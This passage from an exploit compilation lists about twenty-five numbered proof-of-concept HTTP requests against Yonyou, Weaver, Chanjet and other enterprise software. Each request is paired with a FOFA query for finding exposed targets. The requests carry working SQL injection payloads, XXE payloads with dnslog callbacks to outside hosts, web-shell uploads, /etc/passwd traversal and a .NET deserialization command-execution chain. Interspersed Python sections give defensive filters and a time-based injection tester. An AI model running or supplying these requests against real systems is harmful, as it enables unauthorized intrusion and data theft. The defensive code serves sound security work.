User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

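Added example covering the time-based payloads in entries 26, 27 and 29 through 34 (the same WAITFOR DELAY and DBMS_PIPE.RECEIVE_MESSAGE shapes recur in 39, 41, 43, 44, 46 and 51); this is not code from the original compilation. Both primitives make the database sleep for a chosen number of seconds, so confirming them is a timing measurement rather than a response-content check: one slow response proves nothing, but an added delay that tracks the requested sleep across two different values does. The send callable is injected so the logic can be run here against a constructed stand-in that returns elapsed seconds; for a live host it would wrap an HTTP client that times the GET requests above with the payload in the vulnerable parameter.

```python
import re
import statistics
from typing import Callable

# Payload shapes taken from the requests in this list: MSSQL WAITFOR DELAY
# (entries 26, 30, 31, 32, 33, 34) and Oracle DBMS_PIPE.RECEIVE_MESSAGE (27, 29).
TIME_PAYLOADS = {
    "mssql": "1'waitfor delay '0:0:{n}'--",
    "oracle": "1' AND 1=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),{n})--",
}


def build_payload(dialect: str, seconds: int) -> str:
    """Render the time-delay payload for one database dialect."""
    return TIME_PAYLOADS[dialect].format(n=seconds)


def confirm_time_based(send: Callable[[str], float], dialect: str,
                       delays=(2, 5), rounds: int = 3, tolerance: float = 0.8) -> bool:
    """Decide whether the parameter behind `send` is time-based injectable.

    `send(value)` must place `value` in the suspect parameter, issue the request
    and return the elapsed seconds. The benign value "1" gives the baseline; each
    requested delay must then add at least tolerance*delay seconds over it, and
    the added time must grow with the requested delay. Two distinct delays are
    what separates a real sleep from an endpoint that is merely slow or loaded.
    """
    baseline = statistics.median(send("1") for _ in range(rounds))
    added = []
    for seconds in delays:
        observed = statistics.median(send(build_payload(dialect, seconds)) for _ in range(rounds))
        extra = observed - baseline
        if extra < tolerance * seconds:
            return False
        added.append(extra)
    return all(later > earlier for earlier, later in zip(added, added[1:]))


def make_simulated_backend(vulnerable: bool, base_latency: float = 0.3) -> Callable[[str], float]:
    """Constructed stand-in for a live target (no network I/O).

    Returns the seconds a real request would take: the base latency, plus the
    requested delay when the backend is marked vulnerable and the payload carries
    one of the two sleep primitives above.
    """
    sleep_arg = re.compile(r"delay '0:0:(\d+)'|RECEIVE_MESSAGE\([^,]+,(\d+)\)", re.IGNORECASE)

    def send(value: str) -> float:
        match = sleep_arg.search(value)
        if vulnerable and match:
            return base_latency + int(match.group(1) or match.group(2))
        return base_latency

    return send


if __name__ == "__main__":
    for dialect in TIME_PAYLOADS:
        print(dialect, "vulnerable:", confirm_time_based(make_simulated_backend(True), dialect),
              "| patched:", confirm_time_based(make_simulated_backend(False), dialect))
```

The median over several rounds absorbs single outliers; the tolerance factor leaves room for the sleep being shortened by query timeouts, which some of these endpoints enforce.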
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

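Added example for the XXE entries 36, 37, 38, 40 and 45 (not from the original compilation): the pre-parse check a gateway or the receiving service should apply before any XML parser sees the body. Every one of those payloads needs a DOCTYPE, either to declare an external entity (36, 37, 38, 40) or to pull an external DTD (45), and none of these SOAP/RPC endpoints has a legitimate use for one, so the rule is to refuse any DOCTYPE outright and record what it declared. Two details from the requests above shape the code: in 36 and 38 the entity reference travels as %26name%3b inside a form field, so the check must run on the decoded field value rather than on the raw body; in 37 the hostile document is a string inside a CDATA section of an otherwise harmless SOAP envelope, so the inner string has to be checked on its own when the service goes to parse it. The sample bodies are constructed from those shapes; attacker.example is a placeholder host. Python's own expat parser happens not to fetch external entities by default; the Java SOAP stacks behind these endpoints do unless configured otherwise, which is why the check works on text and not on a parser setting.

```python
import re
from urllib.parse import unquote
from xml.etree import ElementTree as ET

# A DOCTYPE is the only place XML can declare entities or reference an external
# DTD, so its mere presence in an untrusted SOAP/RPC body is refused.
_DOCTYPE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
_EXTERNAL_DTD = re.compile(r"<!DOCTYPE\s+[^\s>\[]+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
_ENTITY_DECL = re.compile(r"<!ENTITY\s+(%\s*)?([^\s>]+)\s+(SYSTEM|PUBLIC)", re.IGNORECASE)


class UnsafeXML(ValueError):
    pass


def dtd_findings(decoded_xml: str) -> dict:
    """Summarize what a DOCTYPE in the (already decoded) text would do."""
    ents = [(bool(m.group(1)), m.group(2)) for m in _ENTITY_DECL.finditer(decoded_xml)]
    return {
        "doctype": bool(_DOCTYPE.search(decoded_xml)),
        "external_dtd": bool(_EXTERNAL_DTD.search(decoded_xml)),
        "external_entities": [name for is_param, name in ents if not is_param],
        "parameter_entities": [name for is_param, name in ents if is_param],
    }


def extract_xml_field(form_body: str, field: str) -> str:
    """Pull one field's raw value out of an x-www-form-urlencoded body.

    Splitting on '&' happens before decoding: an encoded %26 inside the field is
    part of the value, a raw '&' separates fields.
    """
    for pair in form_body.split("&"):
        key, sep, value = pair.partition("=")
        if sep and key == field:
            return value
    raise KeyError(field)


def parse_untrusted(document: str) -> ET.Element:
    """Percent-decode, refuse any DOCTYPE, then parse.

    Decoding first is what turns the %26xxe1two%3b of entry 36 into &xxe1two;
    and lets the findings name the entity being referenced.
    """
    decoded = unquote(document)
    if _DOCTYPE.search(decoded):
        raise UnsafeXML("DOCTYPE refused: %r" % (dtd_findings(decoded),))
    return ET.fromstring(decoded)


def inspect_form_field(form_body: str, field: str) -> dict:
    """Findings for the XML carried in one form field (entries 36, 38, 45)."""
    return dtd_findings(unquote(extract_xml_field(form_body, field)))


def is_refused(document: str) -> bool:
    try:
        parse_untrusted(document)
    except UnsafeXML:
        return True
    return False


# Constructed sample bodies (shapes from the entries above, not real captures).
SAMPLES = {
    # entry 36: internal subset declares an external entity; reference is %-encoded
    "soapformat": 'msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]>'
                  '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
                  '<soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode>'
                  '</soap:Fault></soap:Body></soap:Envelope>%0a',
    # entry 45: external DTD only, no entity declaration, other fields follow
    "ufgovbank": 'reqData=<?xml version="1.0"?>\n<!DOCTYPE foo SYSTEM "http://attacker.example/dtd">'
                 '&signData=1&userIP=1',
    # entry 37: the string argument that the service parses as a document of its own
    "iupdate": '<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://attacker.example/x">%aaa;%ccc;%ddd;]><xxx/>',
    "benign": 'msg=<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body/></soap:Envelope>',
}
```

Refusing the whole DOCTYPE, rather than only entity declarations, is deliberate: the entry 45 body declares no entity at all and still causes an outbound fetch through the external DTD reference.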
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

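Added example for the upload entries 24, 28, 35, 42, 48 and 49 (not the vendors' code): the server-side filename handling that would have closed each of them. Every one of those requests relies on the server trusting something the client sent: a destination path in a separate field (fname in 24), a fileType query parameter that selects the extension (28), a path inside filename= (35), or a PHP name, in 49 with a trailing space that Windows strips after the check has passed. The hardened handler below consults none of those hints, takes only the extension from the basename, refuses executable extensions anywhere in the name, and stores under a random server-chosen name in a root that is not served as code. uploads_root is a placeholder directory name.

```python
import os
import secrets
import unicodedata

# Extensions this service is willing to store. Everything else is refused.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
# Extensions a servlet container or PHP might execute. Refused if they appear
# anywhere in the name, so "report.jsp.txt" is not accepted either.
EXECUTABLE_EXTENSIONS = {"jsp", "jspx", "jspf", "php", "phtml", "php5",
                         "asp", "aspx", "ashx", "asmx", "cer", "war"}


class RejectedUpload(ValueError):
    pass


def safe_filename(client_name: str) -> str:
    """Derive the stored name from the client's extension only.

    Refuses NUL bytes, any path separator (so "./webapps/nc_web/1.jsp" and
    "\\webapps\\nc_web\\x.jsp" never reach the filesystem), trailing spaces or
    dots ("s.php " becomes "s.php" once Windows strips them), names without a
    stem or extension, any executable extension, and anything outside the
    allowlist. The stem is replaced by a random token, so the client chooses
    neither the location nor the name under which the file lands.
    """
    if "\x00" in client_name:
        raise RejectedUpload("NUL byte in filename")
    name = unicodedata.normalize("NFKC", client_name)
    if "/" in name or "\\" in name:
        raise RejectedUpload("path separator in filename")
    if name != name.rstrip(" ."):
        raise RejectedUpload("trailing space or dot in filename")
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise RejectedUpload("missing stem or extension")
    extensions = parts[1:]
    hit = EXECUTABLE_EXTENSIONS.intersection(extensions)
    if hit:
        raise RejectedUpload("executable extension: " + ",".join(sorted(hit)))
    if extensions[-1] not in ALLOWED_EXTENSIONS:
        raise RejectedUpload("extension not allowed: " + extensions[-1])
    return secrets.token_hex(16) + "." + extensions[-1]


def destination_path(upload_root: str, stored_name: str) -> str:
    """Join under a fixed root that is not served as code and prove containment.

    Defence in depth for a caller that hands in a name which did not pass
    safe_filename.
    """
    root = os.path.realpath(upload_root)
    full = os.path.realpath(os.path.join(root, stored_name))
    if os.path.commonpath([root, full]) != root:
        raise RejectedUpload("destination escapes upload root")
    return full


def store_path(upload_root: str, client_name: str) -> str:
    """What the handler calls. Client hints such as the fname field (entry 24) or
    the fileType query parameter (entry 28) are simply never consulted."""
    return destination_path(upload_root, safe_filename(client_name))


def is_rejected(client_name: str, upload_root: str = "uploads_root") -> bool:
    try:
        store_path(upload_root, client_name)
    except RejectedUpload:
        return True
    return False


def escapes_root(upload_root: str, stored_name: str) -> bool:
    try:
        destination_path(upload_root, stored_name)
    except RejectedUpload:
        return True
    return False
```

A random stored name also defeats the second half of entries 28 and 49, where the attacker needs to know the path the file landed at in order to request it.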
50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) Social Commerce ERP validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

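Added example for entries 47 and 53 (not from the original compilation). The two requests differ only in encoding, ../ in a query parameter versus ..%2F in the path, so both the download handler and a log-review check have to decode before they look for traversal. The functions below fully percent-decode (including the double-encoded ..%252F form, a generalization beyond what the page shows), unify backslashes, normalize the path lexically and then confirm with realpath that the result stays under the base directory; count_traversals is the log-side version of the same decoding. srv_files is a placeholder directory name.

```python
import os
import posixpath
import re
from urllib.parse import unquote


class TraversalRejected(ValueError):
    pass


def fully_decode(value: str, max_layers: int = 3) -> str:
    """Percent-decode until the text stops changing, so "..%2F" and the
    double-encoded "..%252F" both end up as "../". More than max_layers of
    encoding is itself treated as hostile."""
    for _ in range(max_layers + 1):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise TraversalRejected("too many percent-encoding layers")


def resolve_download(base_dir: str, requested: str) -> str:
    """Map a client-supplied file name onto base_dir or reject it.

    Order matters: decode every layer, drop NUL bytes, turn backslashes into
    slashes, refuse absolute and drive-letter paths, normalize lexically, refuse
    anything that still starts with "..", and finally let the filesystem confirm
    (symlinks included) that the real path is inside the real base.
    """
    name = fully_decode(requested)
    if "\x00" in name:
        raise TraversalRejected("NUL byte in path")
    name = name.replace("\\", "/")
    if name.startswith("/") or re.match(r"^[A-Za-z]:", name):
        raise TraversalRejected("absolute path")
    norm = posixpath.normpath(name)
    if norm in (".", "..") or norm.startswith("../"):
        raise TraversalRejected("escapes base: " + norm)
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, norm))
    if os.path.commonpath([base, full]) != base:
        raise TraversalRejected("real path escapes base")
    return full


def is_rejected_path(base_dir: str, requested: str) -> bool:
    try:
        resolve_download(base_dir, requested)
    except TraversalRejected:
        return True
    return False


# A ".." that is followed by a separator or ends the string; "a..b" does not count.
_DOTDOT = re.compile(r"\.\.(?:/|$)")


def count_traversals(url: str) -> int:
    """Log-review helper: number of parent-directory steps in a request line
    after full decoding. Raises TraversalRejected on absurd encoding depth,
    which a reviewer should treat as a finding in its own right."""
    decoded = fully_decode(url).replace("\\", "/")
    return len(_DOTDOT.findall(decoded))
```

The lexical check and the realpath check both stay in: the first gives a clear rejection reason before touching the filesystem, the second catches a symlink inside the base directory that points outside it.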
54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It executes a command that writes a marker string into a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
